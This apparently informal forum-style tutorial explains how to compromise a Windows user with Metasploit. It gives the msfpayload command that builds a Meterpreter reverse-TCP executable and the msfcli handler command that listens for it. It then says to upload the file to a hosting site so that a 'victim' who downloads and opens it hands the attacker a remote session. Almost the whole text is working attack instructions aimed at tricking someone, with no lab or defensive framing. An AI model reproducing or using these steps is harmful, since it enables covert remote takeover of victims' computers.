Open msfpayload and type

msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444  X > yourfile.exe

Now the file will be created in Home directory
Than type

msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 E

Than upload that .exe file you made to 4shared or any other file hosting
When victim download and open it you will get meterpreter session
If you want you can change payload fromk meterpreter to shell or vncviewer
